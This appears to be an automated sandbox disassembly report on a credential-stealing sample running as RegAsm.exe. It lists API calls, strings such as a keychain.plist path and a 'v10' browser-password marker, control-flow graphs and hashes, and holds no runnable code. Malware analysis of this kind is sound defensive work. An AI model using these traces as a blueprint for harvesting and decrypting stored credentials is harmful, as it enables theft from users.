                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                          • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                          • memset.MSVCRT ref: 0040DF5F
                                          • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                          • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                          • API String ID: 2018390131-3398334509
                                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                          Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                          • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                          • free.MSVCRT ref: 00418803
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                          • String ID:
                                          • API String ID: 1355100292-0
                                          • Opcode ID: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                          • Opcode Fuzzy Hash: 1567c4eabff52167ca9608279aac156b488c53421658029fcd1b3afb43c795bc
                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                          Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51encryptionCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                                          • String ID:
                                          • API String ID: 1945712969-0
                                          • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                          • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                          Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: FileFind$FirstNext
                                          • String ID:
                                          • API String ID: 1690352074-0
                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                          Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                          Download Yara Rule
                                          APIs
                                          • memset.MSVCRT ref: 0041898C
                                          • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: InfoSystemmemset
                                          • String ID:
                                          • API String ID: 3558857096-0
                                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                          Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                          APIs
                                          • memset.MSVCRT ref: 004455C2
                                          • wcsrchr.MSVCRT ref: 004455DA
                                          • memset.MSVCRT ref: 0044570D
                                          • memset.MSVCRT ref: 00445725
                                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                          • memset.MSVCRT ref: 0044573D
                                          • memset.MSVCRT ref: 00445755
                                          • memset.MSVCRT ref: 004458CB
                                          • memset.MSVCRT ref: 004458E3
                                          • memset.MSVCRT ref: 0044596E
                                          • memset.MSVCRT ref: 00445A10
                                          • memset.MSVCRT ref: 00445A28
                                          • memset.MSVCRT ref: 00445AC6
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                                          • memset.MSVCRT ref: 00445B52
                                          • memset.MSVCRT ref: 00445B6A
                                          • memset.MSVCRT ref: 00445C9B
                                          • memset.MSVCRT ref: 00445CB3
                                          • _wcsicmp.MSVCRT ref: 00445D56
                                          • memset.MSVCRT ref: 00445B82
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                          • memset.MSVCRT ref: 00445986
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                          • API String ID: 2334598624-3798722523
                                          • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                          • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                          Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                          • SetErrorMode.KERNEL32(00008001), ref: 00412799
                                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Library$EnumErrorFreeHandleLoadMessageModeModuleResourceTypes
                                          • String ID: $/deleteregkey$/savelangfile
                                          • API String ID: 1442760552-28296030
                                          • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                          • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                          • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                          • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                          Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 0040B71C
                                            • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                            • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                          • wcsrchr.MSVCRT ref: 0040B738
                                          • memset.MSVCRT ref: 0040B756
                                          • memset.MSVCRT ref: 0040B7F5
                                          • CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                          • CloseHandle.KERNEL32(00000000), ref: 0040B838
                                          • memset.MSVCRT ref: 0040B851
                                          • memset.MSVCRT ref: 0040B8CA
                                          • memcmp.MSVCRT ref: 0040B9BF
                                            • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                            • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                          • memset.MSVCRT ref: 0040BB53
                                          • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                          • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: memset$Freewcsrchr$CloseCreateCryptDataFileHandleLibraryLocalUnprotectmemcmpmemcpywcscpy
                                          • String ID: chp$v10
                                          • API String ID: 229402216-2783969131
                                          • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                          • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                          • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                          • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                          Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 505 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 508 413f00-413f11 Process32NextW 505->508 509 413da5-413ded OpenProcess 508->509 510 413f17-413f24 CloseHandle 508->510 511 413eb0-413eb5 509->511 512 413df3-413e26 memset call 413f27 509->512 511->508 513 413eb7-413ebd 511->513 519 413e79-413eae call 413959 call 413ca4 CloseHandle 512->519 520 413e28-413e35 512->520 516 413ec8-413eda call 4099f4 513->516 517 413ebf-413ec6 free 513->517 518 413edb-413ee2 516->518 517->518 525 413ee4 518->525 526 413ee7-413efe 518->526 519->511 522 413e61-413e68 520->522 523 413e37-413e44 GetModuleHandleW 520->523 522->519 529 413e6a-413e77 QueryFullProcessImageNameW 522->529 523->522 528 413e46-413e5c 523->528 525->526 526->508 528->522 529->519
                                          APIs
                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                          • memset.MSVCRT ref: 00413D7F
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                          • memset.MSVCRT ref: 00413E07
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                          • CloseHandle.KERNEL32(?), ref: 00413EA8
                                          • free.MSVCRT ref: 00413EC1
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                          • CloseHandle.KERNEL32(00000000), ref: 00413F1A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: Handle$CloseProcessProcess32freememset$CreateFirstFullImageModuleNameNextOpenQuerySnapshotToolhelp32
                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                          • API String ID: 3957639419-1740548384
                                          • Opcode ID: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                          • Opcode Fuzzy Hash: 697d2da5a721f95489f9f7a13cc0f46109ab4c3059d26eb498157daf767af732
                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                          Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                            • Part of subcall function 0040DD85: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                            • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                            • Part of subcall function 0040DD85: CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                                            • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                            • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                          • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                          • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                          • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                            • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                            • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                          • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                          • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                          • CloseHandle.KERNEL32(?), ref: 0040E13E
                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                          • String ID: bhv
                                          • API String ID: 4234240956-2689659898
                                          • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                          • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                          Function 004466F4 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 562 4466f4-44670e call 446904 GetModuleHandleA 565 446710-44671b 562->565 566 44672f-446732 562->566 565->566 567 44671d-446726 565->567 568 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 566->568 570 446747-44674b 567->570 571 446728-44672d 567->571 575 4467ac-4467b7 __setusermatherr 568->575 576 4467b8-44680e call 4468f0 _initterm GetEnvironmentStringsW _initterm 568->576 570->566 574 44674d-44674f 570->574 571->566 573 446734-44673b 571->573 573->566 577 44673d-446745 573->577 578 446755-446758 574->578 575->576 581 446810-446819 576->581 582 44681e-446825 576->582 577->578 578->568 583 4468d8-4468dd call 44693d 581->583 584 446827-446832 582->584 585 44686c-446870 582->585 588 446834-446838 584->588 589 44683a-44683e 584->589 586 446845-44684b 585->586 587 446872-446877 585->587 593 446853-446864 GetStartupInfoW 586->593 594 44684d-446851 586->594 587->585 588->584 588->589 589->586 591 446840-446842 589->591 591->586 595 446866-44686a 593->595 596 446879-44687b 593->596 594->591 594->593 597 44687c-446894 GetModuleHandleA call 41276d 595->597 596->597 600 446896-446897 exit 597->600 601 44689d-4468d6 _cexit 597->601 600->601 601->583
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,0044E4C0,00000070), ref: 00446703
                                          • __set_app_type.MSVCRT ref: 00446762
                                          • __p__fmode.MSVCRT ref: 00446777
                                          • __p__commode.MSVCRT ref: 00446785
                                          • __setusermatherr.MSVCRT ref: 004467B1
                                          • _initterm.MSVCRT ref: 004467C7
                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,0044E494,0044E498), ref: 004467EA
                                          • _initterm.MSVCRT ref: 004467FD
                                          • GetStartupInfoW.KERNEL32(?), ref: 0044685A
                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00446880
                                          • exit.MSVCRT ref: 00446897
                                          • _cexit.MSVCRT ref: 0044689D
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                          Similarity
                                          • API ID: HandleModule_initterm$EnvironmentInfoStartupStrings__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                          • String ID:
                                          • API String ID: 2791496988-0
                                          • Opcode ID: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                          • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                          • Opcode Fuzzy Hash: ac973ed8bce866ca224172ea4b7a237c44716a7d542afe8b7082d44fa5742df9
                                          • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E
                                          Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • memset.MSVCRT ref: 0040C298
                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
